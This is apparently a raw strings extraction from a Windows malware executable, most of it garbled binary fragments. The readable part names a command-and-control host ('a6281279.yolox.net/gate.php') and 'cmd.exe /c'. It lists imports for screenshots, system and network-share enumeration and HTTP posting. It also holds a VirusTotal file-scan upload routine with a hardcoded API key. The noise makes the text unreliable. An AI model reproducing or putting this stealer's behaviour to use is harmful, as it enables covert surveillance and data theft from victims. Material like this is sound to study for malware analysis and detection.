L!This program cannot be run in DOS mode.
`.rdata
@.data
.reloc
SVW3Sj
2_^[]33}u
[]UPSV33W]u
APEhQ@
}t"EPWE
@u+PRu
@u+PRu
@u+PRuj
@u+PRuE
@u+PRu
3WWWWMQWW
t+UEPj
[]UxSV3Wuu
t5FAfEEPE:
F |EPE
SVWEPQ33E
}}t4Wj
BIu=P@
uMURWM
uuWug!
MQUREPMQR
SV3Wuu
P2_^[]
9u~URV
P2_^[]j
P2_^[]
URE3P}}
MQWP9}~
URWP9}~
EPWP2_^[]9}~
MQWP9}~
URWP9}~
EPWP_^
[]USVu
[]UQSVj
^2[]Wj
_^2[]j
_^2[]S
[]UQSVj
^2[]Wj
_^2[]j
_^2[]S
SW=tQ@
t,QVhQ@
WSVhQ@
tjQVhQ@
u}tuWSV
D73EEMu
EPMQSSh
SSSV3SfUE
P2_^[]
F;s2_^[]
M3EEEPh#@
P3EE9E~
P2_^[]3
;t0V;~
;t0V;~
2_^[]h
F;s2_^[]
M3EEEPh0$@
P3EE9E~
P2_^[]3
;t0V;~
;t0V;~
2_^[]h
EtU<0t-W~
D$$3PVt$ t$$
VVVVVhDR@
VVVVVhDR@
tVVVh 8@
VVt$$t$(
L$LQT$XRP\
tX|$L\$T;t,WV
D$XPVVVVt$0t$4
L$$QhP
T$dhQ@
Rt$8t$<
L$$QVP
T$XRVVj
Vt$8t$<
D$DPhP
L$dhQ@
Qt$Xt$\
D$DPVP
L$XQVVj&Vt$Xt$\
T$,RhP
D$dhQ@
Pt$@t$D6
T$,RVP
t$4t$8
L$<QhP
T$dhQ@
Rt$Pt$T
L$<QVP
Rt$@t$DD$
T$4Rh %@
Vt$@t$D
L$4QVP
Pt$<t$@t$
QVP9t$
UQ3VWC
_^t#hR@
MQjMSE
EPjMWE
E$QM RPQW
E_^[]
VWE3Pj
t2UREPWj
EMQURP
^]USV3W0p
|_^[]UQ}
_13^]UtSVWEP
E+E]+]E
E_^[]U
VEPM3Quu
UESWRP
9uvH_0
t#FL;urWj
[_^]UXSV3W3
u95(f@
u EPMQUR
}EPSV}
UVMQRW
;umU:]Sj
xRU:VV3QO
MQVURP
u339}vSVU
SRV]G ;}r
a6281279.yolox.net
/gate.php
VMGrab
cmd.exe /c
file.exe
/vtapi/v2/file/scan
www.virustotal.com
google.com
HTTP/1.1
Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36
urlmon.dll
ObtainUserAgentString
IsWow64Process
kernel32
HeapReAlloc
HeapAlloc
HeapFree
GetProcessHeap
GetComputerNameA
GetDriveTypeW
Process32First
GetLogicalDrives
GetDriveTypeA
OpenProcess
GetVolumeInformationA
GetFileAttributesW
GetSystemDirectoryA
GetCurrentDirectoryW
Process32Next
GetDiskFreeSpaceA
CreateToolhelp32Snapshot
GetVersionExA
CloseHandle
CreateFileA
GetFileSize
ReadFile
CreateFileW
FindFirstFileW
FindClose
FindNextFileW
GetWindowsDirectoryW
WaitForSingleObject
GetModuleHandleW
GetTickCount
CreateProcessA
GetModuleFileNameW
GetStartupInfoA
GetTempFileNameA
GetTempPathA
DeleteFileA
CreateThread
GetProcAddress
LoadLibraryA
GetCurrentProcess
GetLastError
GetSystemInfo
GetModuleHandleA
GlobalAlloc
GlobalFree
KERNEL32.dll
GetDesktopWindow
ReleaseDC
GetWindowDC
GetWindowRect
USER32.dll
DeleteObject
CreateCompatibleDC
SelectObject
CreateDIBSection
DeleteDC
BitBlt
GDI32.dll
GetUserNameA
OpenProcessToken
GetTokenInformation
DuplicateToken
CheckTokenMembership
CreateWellKnownSid
ADVAPI32.dll
SHGetFolderPathW
SHELL32.dll
CreateStreamOnHGlobal
ole32.dll
sprintf
_wcsicmp
_snwprintf
ntdll.dll
HttpQueryInfoA
InternetConnectA
InternetReadFile
InternetSetOptionA
HttpOpenRequestA
HttpSendRequestA
InternetOpenA
InternetCloseHandle
WININET.dll
GetAdaptersInfo
IPHLPAPI.DLL
GdipSaveImageToStream
GdipGetImageEncodersSize
GdipDisposeImage
GdipCreateBitmapFromHBITMAP
GdipGetImageEncoders
GdiplusStartup
gdiplus.dll
GetModuleFileNameExA
PSAPI.DLL
WNetCloseEnum
WNetOpenEnumW
WNetEnumResourceW
MPR.dll
memset
memcpy
----------%u
Content-Disposition: form-data; name="apikey"
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
4d1ee14a3191ba1afde5261326dcd7e81793afacb6aa7e46d0b467bc6ebcd367
----------%u
Content-Disposition: form-data; name="file"; filename="%s"
Content-Type: application/x-msdownload
Content-Transfer-Encoding: binary
----------%u--
Content-Type: multipart/form-data; boundary=--------%u
jHqA}
kdzbeO\
iLA`rqg
@l2u\E
a=-fAv
\cQkkbal
eLXaMQ:t
jiCn4Fg
c;d>jm
i]Wbgeq6l
8ROggW
A`Ugn1yiFa
fo%6hRw
[&wowG
eibkaEl
`MGiIwn>Jj
)WTg#.zfJa
h]+o*7
0'040t00000/1<1w1111111
2 2,2S2u222222A3H3R3Y3333333
494@4e4444444444
5V5]5y5555666
7=7C7N777777
8B8I8c8x8888888/969n99999C:I:s:}::::
;U;};;;;;;
<%<a<k<}<<<<
=H=O=`======
> >V>>>
?M?S?a????
0E0e00000
1P1]11111D2Q222
44w4~4444444
55555555
6!6W6^666666666
7J7c777777777
898Q888
9D9]9o9999(:::Q:::::
;&;-;@;;;;;;
<#<-<6<]<d<n<u<<<<<<=&=0=7={========D>M>[>k>>.?I?V?o??
0%0A0[0000
1(1C1.2I2V2o22
3%3A3[3333
5<5C55555
6H6L6P6T6X6\66666666
7J7W7777777
8F8M8p8w8888888
9;9L9S99999999[:b::::::::::
;a;k;v;;;;%</<:<<'=.=====?>F>P>W>>>>>
?a?k?s?~?????
0!0y0000000h111111
262z22222 333 4'404N4Y4s4z4444444
5M5T555555
6-6s6z666
7F77777
----------146640--Content-Type: multipart/form-data; boundary=--------146984
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)
Host: www.virustotal.com
Content-Length: 22433
Connection: Keep-Alive
----------151359--Content-Type: multipart/form-data; boundary=--------152453
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.3)
Host: www.virustotal.com
Content-Length: 22774
Connection: Keep-Alive
i m a g e / j p e g